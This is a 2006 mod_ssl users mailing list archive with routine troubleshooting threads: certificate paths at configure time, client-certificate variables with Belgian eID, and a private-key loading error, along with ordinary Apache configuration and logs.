From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Mon, 22 May 2006 16:01:51 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(603HF91 | October 29, 2003) at
 05/22/2006 04:01:53 PM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Je serai absent(e) du  20/05/2006 au 29/05/2006.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 17:24:52 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9464B14D85A; Mon, 22 May 2006 17:24:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from srv01.dns-rf.com (ns1.rackfleet.com [216.240.134.126])
	by master.modssl.org (Postfix) with ESMTP id 04C2814D82B
	for ; Mon, 22 May 2006 17:24:50 +0200 (CEST)
Received: from 194-158-249-204.static.adslpremium.ch ([194.158.249.204] helo=[192.168.178.21])
	by srv01.dns-rf.com with esmtpsa (TLSv1:AES256-SHA:256)
	(Exim 4.52)
	id 1FiCGt-0002EJ-94
	for modssl-users@modssl.org; Mon, 22 May 2006 08:24:39 -0700
Message-ID: <4471D7E0.2040608@sakrina.com>
Date: Mon, 22 May 2006 17:25:20 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: ssl trouples
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - srv01.dns-rf.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - sakrina.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Made all the ca.key and the server.key and sign it via sign.sh everthing 
looked good so far.

then the misery begins.

./configure --with apache... --with-ssl --with-mm 
--with-crt=/var/local/certs --with -key=/var/local/private  
--prefix=../apache_1.3.35  --enabled-shared-ssl

Error:
cannot find SSL x.509 certificated file /var/local/certs

but those buggers are there
ca.key
server.key
ca.crt
server.crt

any hint would be welcome
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 17:48:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9FA3114D85A; Mon, 22 May 2006 17:48:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 8B97B14D82B
	for ; Mon, 22 May 2006 17:48:47 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k4MFmbc5007809
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 22 May 2006 08:48:37 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4) with ESMTP id k4MFmWTv013638
	for ; Mon, 22 May 2006 08:48:32 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4/Submit) id k4MFmV8R013637
	for modssl-users@modssl.org; Mon, 22 May 2006 08:48:31 -0700
Date: Mon, 22 May 2006 08:48:31 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: ssl trouples
Message-ID: <20060522154831.GA13301@ligo.caltech.edu>
References: <4471D7E0.2040608@sakrina.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <4471D7E0.2040608@sakrina.com>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.10i
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 3491814 - 0938264df9d6
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Markus wrote:
> Made all the ca.key and the server.key and sign it via sign.sh everthing 
> looked good so far.
> 
> then the misery begins.
> 
> ./configure --with apache... --with-ssl --with-mm 
> --with-crt=/var/local/certs --with -key=/var/local/private  
> --prefix=../apache_1.3.35  --enabled-shared-ssl
> 
> Error:
> cannot find SSL x.509 certificated file /var/local/certs

It wants the path to the cert, not to the directory containing
the cert. I wonder why they didn't use --with-cert for the
option name?!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 18:39:09 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 35E2414D851; Mon, 22 May 2006 18:39:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from srv01.dns-rf.com (ns1.rackfleet.com [216.240.134.126])
	by master.modssl.org (Postfix) with ESMTP id 6F5DE14D82B
	for ; Mon, 22 May 2006 18:39:07 +0200 (CEST)
Received: from 194-158-249-204.static.adslpremium.ch ([194.158.249.204] helo=[192.168.178.21])
	by srv01.dns-rf.com with esmtpsa (TLSv1:AES256-SHA:256)
	(Exim 4.52)
	id 1FiDQo-0003tT-OE
	for modssl-users@modssl.org; Mon, 22 May 2006 09:38:59 -0700
Message-ID: <4471E968.5090403@sakrina.com>
Date: Mon, 22 May 2006 18:40:08 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: ssl trouples
References: <4471D7E0.2040608@sakrina.com> <20060522154831.GA13301@ligo.caltech.edu>
In-Reply-To: <20060522154831.GA13301@ligo.caltech.edu>
Content-Type: multipart/alternative;
 boundary="------------040309000501080102090409"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - srv01.dns-rf.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - sakrina.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------040309000501080102090409
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Phil Ehrens wrote:

>Markus wrote:
>  
>
>>Made all the ca.key and the server.key and sign it via sign.sh everthing 
>>looked good so far.
>>
>>then the misery begins.
>>
>>./configure --with apache... --with-ssl --with-mm 
>>--with-crt=/var/local/certs --with -key=/var/local/private  
>>--prefix=../apache_1.3.35  --enabled-shared-ssl
>>
>>Error:
>>cannot find SSL x.509 certificated file /var/local/certs
>>    
>>
>
>It wants the path to the cert, not to the directory containing
>the cert. I wonder why they didn't use --with-cert for the
>option name?!
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>  
>
I put that path in, however it still doesn't work. I put it in like this:
the certs and keys are in /usr/local/certs and /usr/local/private.
and i put in/usr/local/certs
and /usr/local/private
or do i understand something wrong, sorry but im a complet unic newbie
Any other suggestions? 

--------------040309000501080102090409
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Phil Ehrens wrote:



  
Markus wrote:
  

  

    
Made all the ca.key and the server.key and sign it via sign.sh everthing 
looked good so far.

then the misery begins.

./configure --with apache... --with-ssl --with-mm 
--with-crt=/var/local/certs --with -key=/var/local/private  
--prefix=../apache_1.3.35  --enabled-shared-ssl

Error:
cannot find SSL x.509 certificated file /var/local/certs
    

  

  

It wants the path to the cert, not to the directory containing
the cert. I wonder why they didn't use --with-cert for the
option name?!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


  



I put that path in, however it still doesn't work. I put it in like
this:

the certs and keys are in /usr/local/certs and /usr/local/private.

and i put in/usr/local/certs

and /usr/local/private

or do i understand something wrong, sorry but im a complet unic newbie

Any other suggestions?  




--------------040309000501080102090409--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 19:12:16 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5EB5014D865; Mon, 22 May 2006 19:12:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id C236414D82B
	for ; Mon, 22 May 2006 19:12:15 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k4MHC74Z010464
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 22 May 2006 10:12:07 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4) with ESMTP id k4MHC2Fj014625
	for ; Mon, 22 May 2006 10:12:02 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4/Submit) id k4MHC1Gh014624
	for modssl-users@modssl.org; Mon, 22 May 2006 10:12:01 -0700
Date: Mon, 22 May 2006 10:12:01 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: ssl trouples
Message-ID: <20060522171201.GA13969@ligo.caltech.edu>
References: <4471D7E0.2040608@sakrina.com> <20060522154831.GA13301@ligo.caltech.edu> <4471E968.5090403@sakrina.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <4471E968.5090403@sakrina.com>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.10i
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 3492693 - 196c8858333c
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Markus wrote:
> Phil Ehrens wrote:
> 
> >Markus wrote:
> > 
> >
> >>Made all the ca.key and the server.key and sign it via sign.sh everthing 
> >>looked good so far.
> >>
> >>then the misery begins.
> >>
> >>./configure --with apache... --with-ssl --with-mm 
> >>--with-crt=/var/local/certs --with -key=/var/local/private  
> >>--prefix=../apache_1.3.35  --enabled-shared-ssl
> >>
> >>Error:
> >>cannot find SSL x.509 certificated file /var/local/certs
> >>   
> >>
> >
> >It wants the path to the cert, not to the directory containing
> >the cert. I wonder why they didn't use --with-cert for the
> >option name?!
> >
> I put that path in, however it still doesn't work. I put it in like this:
> the certs and keys are in /usr/local/certs and /usr/local/private.
> and i put in/usr/local/certs
> and /usr/local/private

It wants something like:

/usr/local/certs/httpdcert.pem
                ^^^^^^^^^^^^^^
                      |
               filename of cert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 19:54:11 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6C44A14D874; Mon, 22 May 2006 19:54:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0102.google.com (wx-out-0102.google.com [66.249.82.200])
	by master.modssl.org (Postfix) with ESMTP id F048414D82B
	for ; Mon, 22 May 2006 19:54:09 +0200 (CEST)
Received: by wx-out-0102.google.com with SMTP id t15so944863wxc
        for ; Mon, 22 May 2006 10:54:01 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=A2WRWTVPIavzRcvCu+79BKyyFP2w5+pcPAmiVs/ex5Cm67Lz2vofF3HhHvmS9y3HRR7MSOBwA+gAGngLzXm+kfdds9RKXnP19LJX1PHWu/DEcWCMIrSnoMYJhWD/mkzl9+k5NXwTA/pmCT0UKeZChvijxJauXXiAj52mi+bkCKY=
Received: by 10.70.15.11 with SMTP id 11mr2507672wxo;
        Mon, 22 May 2006 10:54:01 -0700 (PDT)
Received: by 10.70.32.11 with HTTP; Mon, 22 May 2006 10:54:01 -0700 (PDT)
Message-ID: 
Date: Mon, 22 May 2006 19:54:01 +0200
From: "=?ISO-8859-1?Q?Fran=E7ois_Soumillion?=" 
To: modssl-users@modssl.org
Subject: SSL_CLIENT_XXX is null
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "=?ISO-8859-1?Q?Fran=E7ois_Soumillion?=" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I don't know if my first mail hit the list.  Sorry for the duplicate
if it was the case....

Hi all,

First of all, thanks for the very good job with openssl.  It really rocks !=
!

Now my question:
I'm trying to setup strong authentication via client certificate (belgian e=
id).
You can see my apache config

NameVirtualHost *

       ServerAdmin webmaster@localhost

       DocumentRoot /var/www/

   SSLEngine on
   SSLCertificateFile /etc/apache2/ssl/apache.pem
   SSLCertificateKeyFile /etc/apache2/ssl/apache.pem
   SSLVerifyClient optional_no_ca
   SSLVerifyDepth 5
   SSLCACertificateFile /etc/apache2/ssl/BelgiumRootCA.pem
   SSLOptions +FakeBasicAuth +ExportCertData +StdEnvVars +CompatEnvVars
#    SSLUserName SSL_CLIENT_S_DN_CN
   RequestHeader set SSL_CLIENT_DN %{SSL_CLIENT_DN}e
   RequestHeader set SSL_CLIENT_S_DN %{SSL_CLIENT_S_DN}e
   RequestHeader set SSL_CLIENT_S_DN_CN %{SSL_CLIENT_S_DN_CN}e
   RequestHeader set SSL_CLIENT_S_DN_S %{SSL_CLIENT_S_DN_S}e
   RequestHeader set SSL_SERVER_S_DN %{SSL_SERVER_S_DN}e
   RequestHeader set SSL_PROTOCOL %{SSL_PROTOCOL}e
   RequestHeader set MyHeader "coucou"

       
               Options FollowSymLinks
               AllowOverride None
       
       
               Options Indexes FollowSymLinks MultiViews
               AllowOverride None
               Order allow,deny
               allow from all
               # This directive allows us to have apache2's default start p=
age
               # in /apache2-default/, but still have / go to the right pla=
ce
               # Commented out for Ubuntu
               #RedirectMatch ^/$ /apache2-default/
       

       ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
       
               AllowOverride None
               Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
               Order allow,deny
               Allow from all
       

       ErrorLog /var/log/apache2/error.log

       # Possible values include: debug, info, notice, warn, error, crit,
       # alert, emerg.
       LogLevel info

       CustomLog /var/log/apache2/access.log combined
       ServerSignature On

   Alias /doc/ "/usr/share/doc/"
   
       Options Indexes MultiViews FollowSymLinks
       AllowOverride None
       Order deny,allow
       Deny from all
       Allow from 127.0.0.0/255.0.0.0 ::1/128
   


I've a small PHP script that dumps all the HTTP headers.  All the HTTP
headers about the cient (SSL_CLIENT_XXX) contain (null) while
SSL_SERVER_S_DN and SSL_PROTOCOL are successfully populated.
What's wrong with what I've done.
I use my belgian eid on other website so the root cause is not at the
client side.  I also include my error.log that can maybe help you.  It
looks ok expect for the timeout but I don't know if I have to care
about it.

[Mon May 22 15:23:12 2006] [notice] Apache/2.0.54 (Ubuntu)
PHP/5.0.5-2ubuntu1.2 mod_ssl/2.0.54 OpenSSL/0.9.7g configured --
resuming normal operations
[Mon May 22 15:23:20 2006] [info] Connection to child 0 established
(server localhost.localdomain:443, client 127.0.0.1)
[Mon May 22 15:23:20 2006] [info] Seeding PRNG with 136 bytes of entropy
[Mon May 22 15:23:20 2006] [info] Initial (No.1) HTTPS request
received for child 0 (server localhost.localdomain:443)
[Mon May 22 15:23:27 2006] [info] Connection to child 0 closed with
standard shutdown(server localhost.localdomain:443, client 127.0.0.1)
[Mon May 22 15:23:27 2006] [info] Connection to child 1 established
(server localhost.localdomain:443, client 127.0.0.1)
[Mon May 22 15:23:27 2006] [info] Seeding PRNG with 136 bytes of entropy
[Mon May 22 15:23:27 2006] [info] Initial (No.1) HTTPS request
received for child 1 (server localhost.localdomain:443)
[Mon May 22 15:23:27 2006] [info] Subsequent (No.2) HTTPS request
received for child 1 (server localhost.localdomain:443)
[Mon May 22 15:23:42 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.
[Mon May 22 15:23:42 2006] [info] Connection to child 1 closed with
standard shutdown(server localhost.localdomain:443, client 127.0.0.1)

Thanks in advance for your help

Fran=E7ois
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 22:07:30 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D9E1914D876; Mon, 22 May 2006 22:07:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from srv01.dns-rf.com (ns1.rackfleet.com [216.240.134.126])
	by master.modssl.org (Postfix) with ESMTP id 0FB7514D82B
	for ; Mon, 22 May 2006 22:07:23 +0200 (CEST)
Received: from 194-158-249-204.static.adslpremium.ch ([194.158.249.204] helo=[192.168.178.21])
	by srv01.dns-rf.com with esmtpsa (TLSv1:AES256-SHA:256)
	(Exim 4.52)
	id 1FiGgL-0001xb-IN
	for modssl-users@modssl.org; Mon, 22 May 2006 13:07:14 -0700
Message-ID: <44721A2F.6020003@sakrina.com>
Date: Mon, 22 May 2006 22:08:15 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: ssl trouples
References: <4471D7E0.2040608@sakrina.com> <20060522154831.GA13301@ligo.caltech.edu> <4471E968.5090403@sakrina.com> <20060522171201.GA13969@ligo.caltech.edu>
In-Reply-To: <20060522171201.GA13969@ligo.caltech.edu>
Content-Type: multipart/alternative;
 boundary="------------050402010100000107080606"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - srv01.dns-rf.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - sakrina.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------050402010100000107080606
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Phil Ehrens wrote:

>Markus wrote:
>  
>
>>Phil Ehrens wrote:
>>
>>    
>>
>>>Markus wrote:
>>>
>>>
>>>      
>>>
>>>>Made all the ca.key and the server.key and sign it via sign.sh everthing 
>>>>looked good so far.
>>>>
>>>>then the misery begins.
>>>>
>>>>./configure --with apache... --with-ssl --with-mm 
>>>>--with-crt=/var/local/certs --with -key=/var/local/private  
>>>>--prefix=../apache_1.3.35  --enabled-shared-ssl
>>>>
>>>>Error:
>>>>cannot find SSL x.509 certificated file /var/local/certs
>>>>  
>>>>
>>>>        
>>>>
>>>It wants the path to the cert, not to the directory containing
>>>the cert. I wonder why they didn't use --with-cert for the
>>>option name?!
>>>
>>>      
>>>
>>I put that path in, however it still doesn't work. I put it in like this:
>>the certs and keys are in /usr/local/certs and /usr/local/private.
>>and i put in/usr/local/certs
>>and /usr/local/private
>>    
>>
>
>It wants something like:
>
>/usr/local/certs/httpdcert.pem
>                ^^^^^^^^^^^^^^
>                      |
>               filename of cert
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>  
>
Ahh now it works :) Thanks..
Except httpd dosent start up anymore.. but this we do tommorow :)

--------------050402010100000107080606
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Phil Ehrens wrote:



  
Markus wrote:
  

  

    
Phil Ehrens wrote:

    

    

      
Markus wrote:


      

      

        
Made all the ca.key and the server.key and sign it via sign.sh everthing 
looked good so far.

then the misery begins.

./configure --with apache... --with-ssl --with-mm 
--with-crt=/var/local/certs --with -key=/var/local/private  
--prefix=../apache_1.3.35  --enabled-shared-ssl

Error:
cannot find SSL x.509 certificated file /var/local/certs
  

        

      

      
It wants the path to the cert, not to the directory containing
the cert. I wonder why they didn't use --with-cert for the
option name?!

      

    

    
I put that path in, however it still doesn't work. I put it in like this:
the certs and keys are in /usr/local/certs and /usr/local/private.
and i put in/usr/local/certs
and /usr/local/private
    

  

  

It wants something like:

/usr/local/certs/httpdcert.pem
                ^^^^^^^^^^^^^^
                      |
               filename of cert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


  



Ahh now it works :) Thanks..

Except httpd dosent start up anymore.. but this we do tommorow :)




--------------050402010100000107080606--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 23 02:34:51 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0E14814D880; Tue, 23 May 2006 02:34:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.197])
	by master.modssl.org (Postfix) with ESMTP id 612BF14D82C
	for ; Tue, 23 May 2006 02:34:49 +0200 (CEST)
Received: by nz-out-0102.google.com with SMTP id m7so1294107nzf
        for ; Mon, 22 May 2006 17:34:40 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=KTGauUsuLvGkuZ3oTFqZ8tkTsADnBWRku8I/64/EASB/ILcAPMQb42uyZkZq354yUgeRx84FCDM8uGwLzKAbykl+CYdCuuj78fEWOQiysJpSU5uQ2GsTLRjxNMW0z6XxaWQCxa+u9u7izSI9SFoONE/1rPufdo2qAoItzlfh61o=
Received: by 10.36.67.9 with SMTP id p9mr4160666nza;
        Mon, 22 May 2006 17:34:40 -0700 (PDT)
Received: by 10.37.22.4 with HTTP; Mon, 22 May 2006 17:34:40 -0700 (PDT)
Message-ID: 
Date: Mon, 22 May 2006 18:34:40 -0600
From: "Leon Jaimes" 
To: modssl-users@modssl.org
Subject: New to https, looking for info on how it is setup with a hosted site.
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Leon Jaimes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
I am trying to set up a secure subdomain on my site.  It is hosted on
an Apache server.  Uses Cpanel for the interface.
I have set up a subdomain that redirect to the part of the site I want
secured, and have created and installed my certificates, just looking
for what else needs to be done on my end and what I can expect the
provider to do.
TIA
sly-
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 23 10:48:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9FE6A14D865; Tue, 23 May 2006 10:48:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uranus.mp-software.com (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by master.modssl.org (Postfix) with ESMTP id 10A4E14D82C
	for ; Tue, 23 May 2006 10:48:37 +0200 (CEST)
Received: from [192.168.178.21] (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by uranus.mp-software.com (Postfix) with ESMTP id A2978E403C7
	for ; Tue, 23 May 2006 10:48:29 +0200 (CEST)
Message-ID: <4472CC89.2040204@sakrina.com>
Date: Tue, 23 May 2006 10:49:13 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: ssl trouples
References: <4471D7E0.2040608@sakrina.com> <20060522154831.GA13301@ligo.caltech.edu> <4471E968.5090403@sakrina.com> <20060522171201.GA13969@ligo.caltech.edu>
In-Reply-To: <20060522171201.GA13969@ligo.caltech.edu>
Content-Type: multipart/alternative;
 boundary="------------020008040200040108030902"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------020008040200040108030902
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Phil Ehrens wrote:

>Markus wrote:
>  
>
>>Phil Ehrens wrote:
>>
>>    
>>
>>>Markus wrote:
>>>
>>>
>>>      
>>>
>>>>Made all the ca.key and the server.key and sign it via sign.sh everthing 
>>>>looked good so far.
>>>>
>>>>then the misery begins.
>>>>
>>>>./configure --with apache... --with-ssl --with-mm 
>>>>--with-crt=/var/local/certs --with -key=/var/local/private  
>>>>--prefix=../apache_1.3.35  --enabled-shared-ssl
>>>>
>>>>Error:
>>>>cannot find SSL x.509 certificated file /var/local/certs
>>>>  
>>>>
>>>>        
>>>>
>>>It wants the path to the cert, not to the directory containing
>>>the cert. I wonder why they didn't use --with-cert for the
>>>option name?!
>>>
>>>      
>>>
>>I put that path in, however it still doesn't work. I put it in like this:
>>the certs and keys are in /usr/local/certs and /usr/local/private.
>>and i put in/usr/local/certs
>>and /usr/local/private
>>    
>>
>
>It wants something like:
>
>/usr/local/certs/httpdcert.pem
>                ^^^^^^^^^^^^^^
>                      |
>               filename of cert
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>  
>
[Mon May 22 21:56:26 2006] [error] mod_ssl: Init: Private key not found 
(OpenSSL library error follows)
[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D094068:asn1 encoding 
routines:d2i_ASN1_SET:bad tag
[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D0680A8:asn1 encoding 
routines:ASN1_CHECK_TLEN:wrong tag
[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D07803A:asn1 encoding 
routines:ASN1_ITEM_EX_D2I:nested asn1 error
